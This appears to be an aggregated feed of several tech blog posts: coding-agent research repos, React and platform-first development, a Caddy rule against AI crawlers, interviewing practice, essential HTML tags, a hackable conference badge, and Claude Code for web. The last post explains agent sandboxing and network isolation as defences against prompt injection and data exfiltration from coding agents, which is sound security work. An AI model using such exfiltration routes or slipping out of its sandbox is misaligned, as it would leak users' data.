asked it: Can you figure out how to rewrite cmarkgfm to not use FFI and to use a pyodide-friendly way of integrating that C code instead? ... and it did. You can see the full transcript here . blog-tags-scikit-learn . Taking a short break from WebAssembly, I thought it would be fun to put scikit-learn through its paces on a text classification task against my blog: Work in a new folder called blog-tags-scikit-learn Download - a SQLite database. Take a look at the blog_entry table and the associated tags - a lot of the earlier entries do not have tags associated with them, where the later entries do. Design, implement and execute models to suggests tags for those earlier entries based on textual analysis against later ones Use Python scikit learn and try several different strategies Produce JSON of the results for each one, plus scripts for running them and a detailed markdown description Also include an HTML page with a nice visualization of the results that works by loading those JSON files. This resulted in seven files, four results files and a detailed report . (It ignored the bit about an HTML page with a nice visualization for some reason.) Not bad for a few moments of idle curiosity typed into my phone! That's just three of the thirteen projects in the repository so far. The commit history for each one usually links to the prompt and sometimes the transcript if you want to see how they unfolded. More recently I added a short file to the repo with a few extra tips for my research agents. You can read that here . My preferred definition of AI slop is AI-generated content that is published without human review. I've not been reviewing these reports in great detail myself, and I wouldn't usually publish them online without some serious editing and verification. I want to share the pattern I'm using though, so I decided to keep them quarantined in this one public repository. A tiny feature request for GitHub: I'd love to be able to mark a repository as "exclude from search indexes" such that it gets labelled with tags. I still like to keep AI-generated content out of search, to avoid contributing more to the dead internet . It's pretty easy to get started trying out this coding agent research pattern. Create a free GitHub repository (public or private) and let some agents loose on it and see what happens. You can run agents locally but I find the asynchronous agents to be more convenient - especially as I can run them (or trigger them from my phone) without any fear of them damaging my own machine or leaking any of my private data. Claude Code for web offers a free $250 of credits for their $20/month users for a limited time (until November 18, 2025). Gemini Jules has a free tier . There are plenty of other coding agents you can try out as well. Let me know if your research agents come back with anything interesting! You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options . Code research Coding agents Asynchronous coding agents Give them a dedicated GitHub repository Let them rip with unlimited network access My simonw/research collection This is total slop, of course Try it yourself

0 views
Den Odell 3 weeks ago

Escape Velocity: Break Free from Framework Gravity

Frameworks were supposed to free us from the messy parts of the web. For a while they did, until their gravity started drawing everything else into orbit. Every framework brought with it real progress. React, Vue, Angular, Svelte, and others all gave structure, composability, and predictability to frontend work. But now, after a decade of React dominance, something else has happened. We haven’t just built apps with React, we’ve built an entire ecosystem around it—hiring pipelines, design systems, even companies—all bound to its way of thinking. The problem isn’t React itself, nor any other framework for that matter. The problem is the inertia that sets in once any framework becomes infrastructure. By that point, it’s “too important to fail,” and everything nearby turns out to be just fragile enough to prove it. React is no longer just a library. It’s a full ecosystem that defines how frontend developers are allowed to think. Its success has created its own kind of gravity, and the more we’ve built within it, the harder it’s become to break free. Teams standardize on it because it’s safe: it’s been proven to work at massive scale, the talent pool is large, and the tooling is mature. That’s a rational choice, but it also means React exerts institutional gravity. Moving off it stops being an engineering decision and becomes an organizational risk instead. Solutions to problems tend to be found within its orbit, because stepping outside it feels like drifting into deep space. We saw this cycle with jQuery in the past, and we’re seeing it again now with React. We’ll see it with whatever comes next. Success breeds standardization, standardization breeds inertia, and inertia convinces us that progress can wait. It’s the pattern itself that’s the problem, not any single framework. But right now, React sits at the center of this dynamic, and the stakes are far higher than they ever were with jQuery. Entire product lines, architectural decisions, and career paths now depend on React-shaped assumptions. We’ve even started defining developers by their framework: many job listings ask for “React developers” instead of frontend engineers. Even AI coding agents default to React when asked to start a new frontend project, unless deliberately steered elsewhere. Perhaps the only thing harder than building on a framework is admitting you might need to build without one. React’s evolution captures this tension perfectly. Recent milestones include the creation of the React Foundation , the React Compiler reaching v1.0 , and new additions in React 19.2 such as the and Fragment Refs. These updates represent tangible improvements. Especially the compiler, which brings automatic memoization at build time, eliminating the need for manual and optimization. Production deployments show real performance wins using it: apps in the Meta Quest Store saw up to 2.5x faster interactions as a direct result. This kind of automatic optimization is genuinely valuable work that pushes the entire ecosystem forward. But here’s the thing: the web platform has been quietly heading in the same direction for years, building many of the same capabilities frameworks have been racing to add. Browsers now ship View Transitions, Container Queries, and smarter scheduling primitives. The platform keeps evolving at a fair pace, but most teams won’t touch these capabilities until React officially wraps them in a hook or they show up in Next.js docs. Innovation keeps happening right across the ecosystem, but for many it only becomes “real” once React validates the approach. Which is fine, assuming you enjoy waiting for permission to use the platform you’re already building on. The React Foundation represents an important milestone for governance and sustainability. This new foundation is a part of the Linux Foundation, and founding members include Meta, Vercel, Microsoft, Amazon, Expo, Callstack, and Software Mansion. This is genuinely good for React’s long-term health, providing better governance and removing the risk of being owned by a single company. It ensures React can outlive any one organization’s priorities. But it doesn’t fundamentally change the development dynamic of the framework. Yet. The engineers who actually build React still work at companies like Meta and Vercel. The research still happens at that scale, driven by those performance needs. The roadmap still reflects the priorities of the companies that fund full-time development. And to be fair, React operates at a scale most frameworks will never encounter. Meta serves billions of users through frontends that run on constrained mobile devices around the world, so it needs performance at a level that justifies dedicated research teams. The innovations they produce, including compiler-driven optimization, concurrent rendering, and increasingly fine-grained performance tooling, solve real problems that exist only at that kind of massive scale. But those priorities aren’t necessarily your priorities, and that’s the tension. React’s innovations are shaped by the problems faced by companies running apps at billions-of-users scale, not necessarily the problems faced by teams building for thousands or millions. React’s internal research reveals the team’s awareness of current architectural limitations. Experimental projects like Forest explore signal-like lazy computation graphs; essentially fine-grained reactivity instead of React’s coarse re-render model. Another project, Fir , investigates incremental rendering techniques. These aren’t roadmap items; they’re just research prototypes happening inside Meta. They may never ship publicly. But they do reveal something important: React’s team knows the virtual DOM model has performance ceilings and they’re actively exploring what comes after it. This is good research, but it also illustrates the same dynamic at play again: that these explorations happen behind the walls of Big Tech, on timelines set by corporate priorities and resource availability. Meanwhile, frameworks like Solid and Qwik have been shipping production-ready fine-grained reactivity for years. Svelte 5 shipped runes in 2024, bringing signals to mainstream adoption. The gap isn’t technical capability, but rather when the industry feels permission to adopt it. For many teams, that permission only comes once React validates the approach. This is true regardless of who governs the project or what else exists in the ecosystem. I don’t want this critique to take away from what React has achieved over the past twelve years. React popularized declarative UIs and made component-based architecture mainstream, which was a huge deal in itself. It proved that developer experience matters as much as runtime performance and introduced the idea that UI could be a pure function of input props and state. That shift made complex interfaces far easier to reason about. Later additions like hooks solved the earlier class component mess elegantly, and concurrent rendering through `` opened new possibilities for truly responsive UIs. The React team’s research into compiler optimization, server components, and fine-grained rendering pushes the entire ecosystem forward. This is true even when other frameworks ship similar ideas first. There’s value in seeing how these patterns work at Meta’s scale. The critique isn’t that React is bad, but that treating any single framework as infrastructure creates blind spots in how we think and build. When React becomes the lens through which we see the web, we stop noticing what the platform itself can already do, and we stop reaching for native solutions because we’re waiting for the framework-approved version to show up first. And crucially, switching to Solid, Svelte, or Vue wouldn’t eliminate this dynamic; it would only shift its center of gravity. Every framework creates its own orbit of tools, patterns, and dependencies. The goal isn’t to find the “right” framework, but to build applications resilient enough to survive migration to any framework, including those that haven’t been invented yet. This inertia isn’t about laziness; it’s about logistics. Switching stacks is expensive and disruptive. Retraining developers, rebuilding component libraries, and retooling CI pipelines all take time and money, and the payoff is rarely immediate. It’s high risk, high cost, and hard to justify, so most companies stay put, and honestly, who can blame them? But while we stay put, the platform keeps moving. The browser can stream and hydrate progressively, animate transitions natively, and coordinate rendering work without a framework. Yet most development teams won’t touch those capabilities until they’re built in or officially blessed by the ecosystem. That isn’t an engineering limitation; it’s a cultural one. We’ve somehow made “works in all browsers” feel riskier than “works in our framework.” Better governance doesn’t solve this. The problem isn’t React’s organizational structure; it’s our relationship to it. Too many teams wait for React to package and approve platform capabilities before adopting them, even when those same features already exist in browsers today. React 19.2’s `` component captures this pattern perfectly. It serves as a boundary that hides UI while preserving component state and unmounting effects. When set to , it pauses subscriptions, timers, and network requests while keeping form inputs and scroll positions intact. When revealed again by setting , those effects remount cleanly. It’s a genuinely useful feature. Tabbed interfaces, modals, and progressive rendering all benefit from it, and the same idea extends to cases where you want to pre-render content in the background or preserve state as users navigate between views. It integrates smoothly with React’s lifecycle and `` boundaries, enabling selective hydration and smarter rendering strategies. But it also draws an important line between formalization and innovation . The core concept isn’t new; it’s simply about pausing side effects while maintaining state. Similar behavior can already be built with visibility observers, effect cleanup, and careful state management patterns. The web platform even provides the primitives for it through tools like , DOM state preservation, and manual effect control. What . Yet it also exposes how dependent our thinking has become on frameworks. We wait for React to formalize platform behaviors instead of reaching for them directly. This isn’t a criticism of `` itself; it’s a well-designed API that solves a real problem. But it serves as a reminder that we’ve grown comfortable waiting for framework solutions to problems the platform already lets us solve. After orbiting React for so long, we’ve forgotten what it feels like to build without its pull. The answer isn’t necessarily to abandon your framework, but to remember that it runs inside the web, not the other way around. I’ve written before about building the web in islands as one way to rediscover platform capabilities we already have. Even within React’s constraints, you can still think platform first: These aren’t anti-React practices, they’re portable practices that make your web app more resilient. They let you adopt new browser capabilities as soon as they ship, not months later when they’re wrapped in a hook. They make framework migration feasible rather than catastrophic. When you build this way, React becomes a rendering library that happens to be excellent at its job, not the foundation everything else has to depend on. A React app that respects the platform can outlast React itself. When you treat React as an implementation detail instead of an identity, your architecture becomes portable. When you embrace progressive enhancement and web semantics, your ideas survive the next framework wave. The recent wave of changes, including the React Foundation, React Compiler v1.0, the `` component, and internal research into alternative architectures, all represent genuine progress. The React team is doing thoughtful work, but these updates also serve as reminders of how tightly the industry has become coupled to a single ecosystem’s timeline. That timeline is still dictated by the engineering priorities of large corporations, and that remains true regardless of who governs the project. If your team’s evolution depends on a single framework’s roadmap, you are not steering your product; you are waiting for permission to move. That is true whether you are using React, Vue, Angular, or Svelte. The framework does not matter; the dependency does. It is ironic that we spent years escaping jQuery’s gravity, only to end up caught in another orbit. React was once the radical idea that changed how we build for the web. Every successful framework reaches this point eventually, when it shifts from innovation to institution, from tool to assumption. jQuery did it, React did it, and something else will do it next. The React Foundation is a positive step for the project’s long-term sustainability, but the next real leap forward will not come from better governance. It will not come from React finally adopting signals either, and it will not come from any single framework “getting it right.” Progress will come from developers who remember that frameworks are implementation details, not identities. Build for the platform first. Choose frameworks second. The web isn’t React’s, it isn’t Vue’s, and it isn’t Svelte’s. It belongs to no one. If we remember that, it will stay free to evolve at its own pace, drawing the best ideas from everywhere rather than from whichever framework happens to hold the cultural high ground. Frameworks are scaffolding, not the building. Escaping their gravity does not mean abandoning progress; it means finding enough momentum to keep moving. Reaching escape velocity, one project at a time. Use native forms and form submissions to a server, then enhance with client-side logic Prefer semantic HTML and ARIA before reaching for component libraries Try View Transitions directly with minimal React wrappers instead of waiting for an official API Use Web Components for self-contained widgets that could survive a framework migration Keep business logic framework-agnostic, plain TypeScript modules rather than hooks, and aim to keep your hooks short by pulling logic from outside React Profile performance using browser DevTools first and React DevTools second Try native CSS features like , , scroll snap , , and before adding JavaScript solutions Use , , and instead of framework-specific alternatives wherever possible Experiment with the History API ( , ) directly before reaching for React Router Structure code so routing, data fetching, and state management can be swapped out independently of React Test against real browser APIs and behaviors, not just framework abstractions

0 views
Rik Huijzer 3 weeks ago

AI Crawler Mitigation via a Few Lines of Caddy

To mitigate AI crawlers, simply require a bit of Javascript: ```caddy domain.com { # Match all requests without a "verified" cookie" @unverified not header Cookie *verified* # Serve them a JS page that sets the cookie handle @unverified { header Content-Type text/html respond <<EOF EOF 418 } # Handle all other requests normally reverse_proxy localhost:3001 } ``` This works because these crawlers have disabl...

0 views

Gatekeepers vs. Matchmakers

I estimate I’ve conducted well over 1,000 job interviews for developers and managers in my career. This has caused me to form opinions about what makes a good interview. I’ve spent the majority of it in fast-growing companies and, with the exception of occasional pauses here and there, we were always hiring. I’ve interviewed at every level from intern (marathon sessions at the University of Waterloo campus interviewing dozens of candidates over a couple of days) to VP and CTO level (my future bosses in some cases, my successor in roles I was departing in others). Probably the strongest opinion that I hold after all that is: adopting a Matchmaker approach builds much better teams than falling into Gatekeeper mode. Once the candidate has passed some sort of initial screen, either with a recruiter, the hiring manager, or both, most “primary” interviews are conducted with two to three employees interviewing the candidate—often the hiring manager and an individual contributor. (Of course, there are innumerable ways you can structure this, but that structure is what I’ve seen to be the most common.) Interviewers usually start with one of two postures when interviewing: the Gatekeeper or the Matchmaker : The former, the Gatekeeper , I would say is more common overall and certainly more common among individual contributors and people earlier in their career. It’s also a big driver of why a lot of interview processes include some sort of coding “test” meant to expose the fraudulent scammers pretending to be “real” programmers. All of that dates back to the early 2000s and the post-dotcom crash. Pre-crash, anyone with a pulse who could string together some HTML could get a “software developer” job, so there were a lot of people with limited experience and skills on the job market. Nowadays, aside from outright fraudsters (which are rare) I haven’t observed many wholly unqualified people getting past the résumé review or initial screen. If you let Gatekeepers design your interview process, you’ll often get something that I refer to as “programmer Jeopardy! .” The candidate is peppered with what amount to trivia questions: …and so on. For most jobs where you’re building commercial software by gluing frameworks and APIs together, having vague (or even no) knowledge of those concepts is going to be plenty. Most devs can go a long time using Java or C# before getting into some sort of jam where learning intimate details of the garbage collector’s operation gets them out of it. (This wasn’t always true, but things have improved.) Of course, if the job you’re hiring for is some sort of specialist role around your databases, queuing systems, or infrastructure in general, you absolutely should probe for specialist knowledge of those things. But if the job is “full stack web developer,” where they’re mostly going to be writing business logic and user interface code, they may have plenty of experience and be very good at those things without ever having needed to learn about consensus algorithms and the like. Then, of course, there’s the much-discussed “coding challenge,” the worst versions of which involve springing a problem on someone, giving them a generous four or five minutes to read it, then expecting them to code a solution with a countdown timer running and multiple people watching them. Not everyone can put their best foot forward in those conditions, and after you’ve run the same exercise more than a few times with candidates, it’s easy to forget what the “first-look” experience is like for candidates. Maybe I’ll write a full post about it someday, but it’s my firm conviction that these types of tests have a false-negative rate so high that they’re counterproductive. Gatekeeper types often over-rotate on the fear of “fake” programmers getting hired and use these trivia-type questions and high-pressure exercises to disqualify people who would be perfectly capable of doing the job you need them to do and perfectly capable of learning any of that other stuff quickly, on an as-needed basis. If your interview process feels a bit like an elimination game show, you can probably do better. You, as a manager, are judged both on the quality of your hires and your ability to fill open roles. When the business budgets for a role to be filled, they do so because they expect a business outcome from hiring that person. Individual contributors are not generally rewarded or punished for hiring decisions, so their incentive is to avoid bringing in people who make extra work for them. Hiring an underskilled person onto the team is a good way to drag down productivity rather than improve it, as everyone has to spend some of their time carrying that person. Additionally, the absence of any kind of licensing or credentialing structure✳️ in programming creates a vacuum that the elimination game show tries to fill. In medicine, law, aviation, or the trades, there’s an external gatekeeper that ensures a baseline level of competence before anyone can even apply for a job. In software, there’s no equivalent, so it makes sense that some interviewers take a “prove to me you can do this job” approach out of the gate. But there’s a better way. “Matchmaking” in the romantic sense tries to pair up people with mutual compatibilities in the hopes that their relationship will also be mutually beneficial to both parties—a real “whole is greater than the sum of its parts” scenario. This should also be true of hiring. You have a need for some skills that will elevate and augment your team; candidates have a desire to do work that means something to them with people they like being around (and yes, money to pay the bills, of course). When people date each other, they’re usually not looking to reject someone based on a box-checking exercise. Obviously, some don’t make it past the initial screen for various reasons, but if you’re going on a second date and looking for love, you’re probably doing it because you want it to work out. Same goes for hiring. If you take the optimistic route, you can let go of some of the pass/fail and one-size-fits-all approaches to candidate evaluation and spend more time trying to find a love match. For all but the most junior roles, I’m confident you can get a strong handle on a candidate’s technical skills by exploring their work history in depth. I’m a big fan of “behavioural” interviewing, where you ask about specific things the candidate has done. I start with a broad opening question and then use ad hoc follow-ups in as conversational a manner as I can muster. I want to have a discussion, not an interrogation. Start with questions like: If you practice, or watch someone who is good at this type of interview, you can easily fill a 45–60 minute interview slot with a couple of those top-level questions and some ad hoc follow-ups based on their answers. Of the three examples I gave, two are a good starting place for assessing technical skills. Most developers will give you a software project as the work they’re the most proud of (if they say “I raised hamsters as a kid,” feel free to ask them to limit it to the realm of software development and try again). This is your opportunity to dig in on the technical details: Questions like that will give you a much stronger signal on their technical skills and, importantly, experience. You should be able to easily tell how much the candidate was a driver vs. a passenger on the project, whether or not they thought about the bigger picture, and how deep or shallow their knowledge was. And, of course, you can keep asking follow-up questions to the follow-up questions until you’ve got a good sense. Interviewing and taking a job does have a lot of parallels to dating and getting married. There are emotional and financial implications for both parties if it doesn’t work out, there’s always a degree of risk involved, and there’s sometimes a degree of asymmetry between the parties. In the job market, the asymmetry is nearly always in favour of the employer. They hold most of the cards and can dictate the terms of the process completely. You have a choice as a leader how much you want to wield that power. My advice is to wield it sparingly—try to give candidates the kind of experience where even if you don’t hire them, they had a good enough time in the process that they’d still recommend you to a friend. Taking an interest in their experience, understanding what motivates them, and fitting candidates to the role that maximizes their existing skills, challenges them in the right ways, and takes maximum advantage of their intrinsic motivations will produce much better results than making them run through the gauntlet like a contestant on Survivor . " Old Royal Naval College, Greenwich - King William Court and Queen Mary Court - gate " by ell brown is licensed under CC BY 2.0 . Like this? Please feel free to share it on your favourite social media or link site! Share it with friends! Hit subscribe to get new posts delivered to your inbox automatically. Feedback? Questions? Topic Suggestions? Get in touch ! I don’t want to hire this person unless they prove themselves worthy . It’s my job to keep the bad and fake programmers out. ( Gatekeeper ) I want to hire this person unless they disqualify themselves somehow. It’s my job to find a good match between our needs and the candidate’s skills and interests. ( Matchmaker ) What’s a deadlock? How do you resolve it? Oh, you know Java? Explain how the garbage collector works! What’s the CAP theorem? What’s the work you’ve done that you’re the most proud of?✳️ What’s the hardest technical problem you’ve encountered? What was the resolution? Tell me about your favourite team member to work with. Least favourite? What language or frameworks did they use? Did they choose, or did someone else? How was it deployed? What sort of testing strategy did they use? What databases were involved? How did their stuff fit into the architecture of the broader system?

1 views
Simon Willison 1 months ago

Hacking the WiFi-enabled color screen GitHub Universe conference badge

I'm at GitHub Universe this week (thanks to a free ticket from Microsoft). Yesterday I picked up my conference badge... which incorporates a full Raspberry Pi Raspberry Pi Pico microcontroller with a battery, color screen, WiFi and bluetooth. GitHub Universe has a tradition of hackable conference badges - the badge last year had an eInk display. This year's is a huge upgrade though - a color screen and WiFI connection makes this thing a genuinely useful little computer! The only thing it's missing is a keyboard - the device instead provides five buttons total - Up, Down, A, B, C. It might be possible to get a bluetooth keyboard to work though I'll believe that when I see it - there's not a lot of space on this device for a keyboard driver. Everything is written using MicroPython, and the device is designed to be hackable: connect it to a laptop with a USB-C cable and you can start modifying the code directly on the device. Out of the box the badge will play an opening animation (implemented as a sequence of PNG image frames) and then show a home screen with six app icons. The default apps are mostly neat Octocat-themed demos: a flappy-bird clone, a tamagotchi-style pet, a drawing app that works like an etch-a-sketch, an IR scavenger hunt for the conference venue itself (this thing has an IR sensor too!), and a gallery app showing some images. The sixth app is a badge app. This will show your GitHub profile image and some basic stats, but will only work if you dig out a USB-C cable and make some edits to the files on the badge directly. I did this on a Mac. I plugged a USB-C cable into the badge which caused MacOS to treat it as an attached drive volume. In that drive are several files including . Open that up, confirm the WiFi details are correct and add your GitHub username. The file should look like this: The badge comes with the SSID and password for the GitHub Universe WiFi network pre-populated. That's it! Unmount the disk, hit the reboot button on the back of the badge and when it comes back up again the badge app should look something like this: Here's the official documentation for building software for the badge. When I got mine yesterday the official repo had not yet been updated, so I had to figure this out myself. I copied all of the code across to my laptop, added it to a Git repo and then fired up Claude Code and told it: Here's the result , which was really useful for getting a start on understanding how it all worked. Each of the six default apps lives in a folder, for example apps/sketch/ for the sketching app. There's also a menu app which powers the home screen. That lives in apps/menu/ . You can edit code in here to add new apps that you create to that screen. I told Claude: This was a bit of a long-shot, but it totally worked! The first version had an error: I OCRd that photo (with the Apple Photos app) and pasted the message into Claude Code and it fixed the problem. This almost worked... but the addition of a seventh icon to the 2x3 grid meant that you could select the icon but it didn't scroll into view. I had Claude fix that for me too . Here's the code for apps/debug/__init__.py , and the full Claude Code transcript created using my terminal-to-HTML app described here . Here are the four screens of the debug app: The icons used on the app are 24x24 pixels. I decided it would be neat to have a web app that helps build those icons, including the ability to start by creating an icon from an emoji. I bulit this one using Claude Artifacts . Here's the result, now available at tools.simonwillison.net/icon-editor : I noticed that last year's badge configuration app (which I can't find in github.com/badger/badger.github.io any more, I think they reset the history on that repo?) worked by talking to MicroPython over the Web Serial API from Chrome. Here's my archived copy of that code . Wouldn't it be useful to have a REPL in a web UI that you could use to interact with the badge directly over USB? I pointed Claude Code at a copy of that repo and told it: It took a bit of poking (here's the transcript ) but the result is now live at tools.simonwillison.net/badge-repl . It only works in Chrome - you'll need to plug the badge in with a USB-C cable and then click "Connect to Badge". If you're a GitHub Universe attendee I hope this is useful. The official badger.github.io site has plenty more details to help you get started. There isn't yet a way to get hold of this hardware outside of GitHub Universe - I know they had some supply chain challenges just getting enough badges for the conference attendees! It's a very neat device, built for GitHub by Pimoroni in Sheffield, UK. A version of this should become generally available in the future under the name "Pimoroni Tufty 2350". You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options .

1 views
Jim Nielsen 1 months ago

Don’t Forget These Tags to Make HTML Work Like You Expect

I was watching Alex Petros’ talk and he has a slide in there titled “Incantations that make HTML work correctly”. This got me thinking about the basic snippets of HTML I’ve learned to always include in order for my website to work as I expect in the browser — like “Hey I just made a file on disk and am going to open it in the browser. What should be in there?” This is what comes to mind: Without , browsers may switch to quirks mode, emulating legacy, pre-standards behavior. This will change how calculations work around layout, sizing, and alignment. is what you want for consistent rendering. Or if you prefer writing markup like it’s 1998. Or even if you eschew all societal norms. It’s case-insensitive so they’ll all work. Declare the document’s language. Browsers, search engines, assistive technologies, etc. can leverage it to: Omit it and things will look ok, but lots of basic web-adjacent tools might get things wrong. Specifying it makes everything around the HTML work better and more accurately, so I always try to remember to include it. This piece of info can come back from the server as a header, e.g. But I like to set it in my HTML, especially when I’m making files on disk I open manually in the browser. This tells the browser how to interpret text, ensuring characters like é, ü, and others display correctly. So many times I’ve opened a document without this tag and things just don’t look right — like my smart quotes . For example: copy this snippet, stick it in an HTML file, and open it on your computer: Things might look a bit wonky. But stick a tag in there and you’ll find some relief. Sometimes I’ll quickly prototype a little HTML and think, “Great it’s working as I expect!” Then I go open it on mobile and everything looks tiny — “[Facepalm] you forgot the meta viewport tag!” Take a look at this screenshot, where I forgot the meta viewport tag on the left but included it on the right: That ever happen to you? No, just me? Well anyway, it’s a good ‘un to include to make HTML work the way you expect. I know what you’re thinking, I forgot the most important snippet of them all for writing HTML: Reply via: Email · Mastodon · Bluesky Get pronunciation and voice right for screen readers Improve indexing and translation accuracy Apply locale-specific tools (e.g. spell-checking)

1 views
Simon Willison 1 months ago

Video: Building a tool to copy-paste share terminal sessions using Claude Code for web

This afternoon I was manually converting a terminal session into a shared HTML file for the umpteenth time when I decided to reduce the friction by building a custom tool for it - and on the spur of the moment I fired up Descript to record the process. The result is this new 11 minute YouTube video showing my workflow for vibe-coding simple tools from start to finish. The problem I wanted to solve involves sharing my Claude Code CLI sessions - and the more general problem of sharing interesting things that happen in my terminal. A while back I discovered (using my vibe-coded clipboard inspector ) that copying and pasting from the macOS terminal populates a rich text clipboard format which preserves the colors and general formatting of the terminal output. The problem is that format looks like this: This struck me as the kind of thing an LLM might be able to write code to parse, so I had ChatGPT take a crack at it and then later rewrote it from scratch with Claude Sonnet 4.5 . The result was this rtf-to-html tool which lets you paste in rich formatted text and gives you reasonably solid HTML that you can share elsewhere. To share that HTML I've started habitually pasting it into a GitHub Gist and then taking advantage of , a neat little unofficial tool that accepts and displays the gist content as a standalone HTML page... which means you can link to rendered HTML that's stored in a gist. So my process was: Not too much hassle, but frustratingly manual if you're doing it several times a day. Ideally I want a tool where I can do this: I decided to get Claude Code for web to build the entire thing. Here's the full prompt I used on claude.ai/code , pointed at my repo, to build the tool: It's quite a long prompt - it took me several minutes to type! But it covered the functionality I wanted in enough detail that I was pretty confident Claude would be able to build it. I'm using one key technique in this prompt: I'm referencing existing tools in the same repo and telling Claude to imitate their functionality. I first wrote about this trick last March in Running OCR against PDFs and images directly in your browser , where I described how a snippet of code that used PDF.js and another snippet that used Tesseract.js was enough for Claude 3 Opus to build me this working PDF OCR tool . That was actually the tool that kicked off my tools.simonwillison.net collection in the first place, which has since grown to 139 and counting. Here I'm telling Claude that I want the RTF to HTML functionality of rtf-to-html.html combined with the Gist saving functionality of openai-audio-output.html . That one has quite a bit going on. It uses the OpenAI audio API to generate audio output from a text prompt, which is returned by that API as base64-encoded data in JSON. Then it offers the user a button to save that JSON to a Gist, which gives the snippet a URL. Another tool I wrote, gpt-4o-audio-player.html , can then accept that Gist ID in the URL and will fetch the JSON data and make the audio playable in the browser. Here's an example . The trickiest part of this is API tokens. I've built tools in the past that require users to paste in a GitHub Personal Access Token (PAT) (which I then store in in their browser - I don't want other people's authentication credentials anywhere near my own servers). But that's a bit fiddly. Instead, I figured out the minimal Cloudflare worker necessary to implement the server-side portion of GitHub's authentication flow. That code lives here and means that any of the HTML+JavaScript tools in my collection can implement a GitHub authentication flow if they need to save Gists. But I don't have to tell the model any of that! I can just say "do the same trick that openai-audio-output.html does" and Claude Code will work the rest out for itself. Here's what the resulting app looks like after I've pasted in some terminal output from Claude Code CLI: It's exactly what I asked for, and the green-on-black terminal aesthetic is spot on too. There are a bunch of other things that I touch on in the video. Here's a quick summary: You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options . The initial problem The problem I wanted to solve involves sharing my Claude Code CLI sessions - and the more general problem of sharing interesting things that happen in my terminal. A while back I discovered (using my vibe-coded clipboard inspector ) that copying and pasting from the macOS terminal populates a rich text clipboard format which preserves the colors and general formatting of the terminal output. The problem is that format looks like this: This struck me as the kind of thing an LLM might be able to write code to parse, so I had ChatGPT take a crack at it and then later rewrote it from scratch with Claude Sonnet 4.5 . The result was this rtf-to-html tool which lets you paste in rich formatted text and gives you reasonably solid HTML that you can share elsewhere. To share that HTML I've started habitually pasting it into a GitHub Gist and then taking advantage of , a neat little unofficial tool that accepts and displays the gist content as a standalone HTML page... which means you can link to rendered HTML that's stored in a gist. So my process was: Copy terminal output Paste into rtf-to-html Copy resulting HTML Paste that int a new GitHub Gist Grab that Gist's ID Share the link to Copy terminal output Paste into a new tool Click a button and get a link to share tools.simonwillison.net/colophon is the list of all of my tools, with accompanying AI-generated descriptions. Here's more about how I built that with Claude Code and notes on how I added the AI-generated descriptions . gistpreview.github.io is really neat. I used Descript to record and edit the video. I'm still getting the hang of it - hence the slightly clumsy pan-and-zoom - but it's pretty great for this kind of screen recording. The site's automated deploys are managed by this GitHub Actions workflow . I also have it configured to work with Cloudflare Pages for those preview deployments from PRs (here's an example ). The automated documentation is created using my llm tool and llm-anthropic plugin. Here's the script that does that , recently upgraded to use Claude Haiku 4.5.

0 views
Simon Willison 1 months ago

Claude Code for web - a new asynchronous coding agent from Anthropic

Anthropic launched Claude Code for web this morning. It's an asynchronous coding agent - their answer to OpenAI's Codex Cloud and Google's Jules , and has a very similar shape. I had preview access over the weekend and I've already seen some very promising results from it. It's available online at claude.ai/code and shows up as a tab in the Claude iPhone app as well: As far as I can tell it's their latest Claude Code CLI app wrapped in a container (Anthropic are getting really good at containers these days) and configured to . It appears to behave exactly the same as the CLI tool, and includes a neat "teleport" feature which can copy both the chat transcript and the edited files down to your local Claude Code CLI tool if you want to take over locally. It's very straight-forward to use. You point Claude Code for web at a GitHub repository, select an environment (fully locked down, restricted to an allow-list of domains or configured to access domains of your choosing, including "*" for everything) and kick it off with a prompt. While it's running you can send it additional prompts which are queued up and executed after it completes its current step. Once it's done it opens a branch on your repo with its work and can optionally open a pull request. Claude Code for web's PRs are indistinguishable from Claude Code CLI's, so Anthropic told me it was OK to submit those against public repos even during the private preview. Here are some examples from this weekend: That second example is the most interesting. I saw a tweet from Armin about his MiniJinja Rust template language adding support for Python 3.14 free threading. I hadn't realized that project had Python bindings, so I decided it would be interesting to see a quick performance comparison between MiniJinja and Jinja2. I ran Claude Code for web against a private repository with a completely open environment ( in the allow-list) and prompted: I’m interested in benchmarking the Python bindings for https://github.com/mitsuhiko/minijinja against the equivalente template using Python jinja2 Design and implement a benchmark for this. It should use the latest main checkout of minijinja and the latest stable release of jinja2. The benchmark should use the uv version of Python 3.14 and should test both the regular 3.14 and the 3.14t free threaded version - so four scenarios total The benchmark should run against a reasonably complicated example of a template, using template inheritance and loops and such like In the PR include a shell script to run the entire benchmark, plus benchmark implantation, plus markdown file describing the benchmark and the results in detail, plus some illustrative charts created using matplotlib I entered this into the Claude iPhone app on my mobile keyboard, hence the typos. It churned away for a few minutes and gave me exactly what I asked for. Here's one of the four charts it created: (I was surprised to see MiniJinja out-performed by Jinja2, but I guess Jinja2 has had a decade of clever performance optimizations and doesn't need to deal with any extra overhead of calling out to Rust.) Note that I would likely have got the exact same result running this prompt against Claude CLI on my laptop. The benefit of Claude Code for web is entirely in its convenience as a way of running these tasks in a hosted container managed by Anthropic, with a pleasant web and mobile UI layered over the top. It's interesting how Anthropic chose to announce this new feature: the product launch is buried half way down their new engineering blog post Beyond permission prompts: making Claude Code more secure and autonomous , which starts like this: Claude Code's new sandboxing features, a bash tool and Claude Code on the web, reduce permission prompts and increase user safety by enabling two boundaries: filesystem and network isolation. I'm very excited to hear that Claude Code CLI is taking sandboxing more seriously. I've not yet dug into the details of that - it looks like it's using seatbelt on macOS and Bubblewrap on Linux. Anthropic released a new open source (Apache 2) library, anthropic-experimental/sandbox-runtime , with their implementation of this so far. Filesystem sandboxing is relatively easy. The harder problem is network isolation, which they describe like this: Network isolation , by only allowing internet access through a unix domain socket connected to a proxy server running outside the sandbox. This proxy server enforces restrictions on the domains that a process can connect to, and handles user confirmation for newly requested domains. And if you’d like further-increased security, we also support customizing this proxy to enforce arbitrary rules on outgoing traffic. This is crucial to protecting against both prompt injection and lethal trifecta attacks. The best way to prevent lethal trifecta attacks is to cut off one of the three legs, and network isolation is how you remove the data exfiltration leg that allows successful attackers to steal your data. If you run Claude Code for web in "No network access" mode you have nothing to worry about. I'm a little bit nervous about their "Trusted network access" environment. It's intended to only allow access to domains relating to dependency installation, but the default domain list has dozens of entries which makes me nervous about unintended exfiltration vectors sneaking through. You can also configure a 